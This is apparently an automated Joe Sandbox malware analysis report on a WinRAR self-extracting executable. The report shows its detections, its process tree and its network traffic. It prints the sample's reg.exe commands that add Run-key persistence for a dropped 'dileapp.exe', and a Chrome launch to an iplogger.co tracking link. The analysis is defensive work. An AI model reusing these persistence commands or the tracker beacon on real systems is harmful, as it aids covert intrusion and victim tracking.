Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1565648
MD5:b9657f229c7591f44dbef1bfb5c2be01
SHA1:75698067fa4151e5f980035c9e4e528fb07fa1e3
SHA256:6833761d646963c16bba26bce95782d216d9450e1cce16c2560e49ffa7f95f7a
Tags:exeuser-Bitsight
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Sigma detected: New RUN Key Pointing to Suspicious Folder
Uses cmd line tools excessively to alter registry or file data
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
File is packed with WinRar
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • file.exe (PID: 6832 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B9657F229C7591F44DBEF1BFB5C2BE01)
    • cmd.exe (PID: 1308 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 5052 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3300 cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • chrome.exe (PID: 5480 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1tJFB4 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 6452 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1980,i,4637800445937414229,16644580557611955956,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Netstat\dileapp.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5052, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Netstat\dileapp.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5052, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1308, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe", ProcessId: 5052, ProcessName: reg.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1308, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe", ProcessId: 5052, ProcessName: reg.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Netstat\dileapp.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 3300, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Netstat
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Users\Public\Netstat\dileapp\SourceMod_Setup.exeReversingLabs: Detection: 25%
Source: file.exeReversingLabs: Detection: 28%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 89.2% probability
Source: https://iplogger.co/1tJFB4HTTP Parser: No favicon
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0087A273
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0088A537
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewIP Address: 104.21.82.93 104.21.82.93
Source: Joe Sandbox ViewIP Address: 172.67.167.249 172.67.167.249
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.68.201
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.68.201
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: global trafficHTTP traffic detected: GET /1tJFB4 HTTP/1.1Host: iplogger.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: iplogger.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iplogger.co/1tJFB4Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 56396975137264100=2; clhf03028ja=8.46.123.228
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: iplogger.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 56396975137264100=2; clhf03028ja=8.46.123.228
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UdDeAusWWV4YHsm&MD=+XvgSgZm HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UdDeAusWWV4YHsm&MD=+XvgSgZm HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
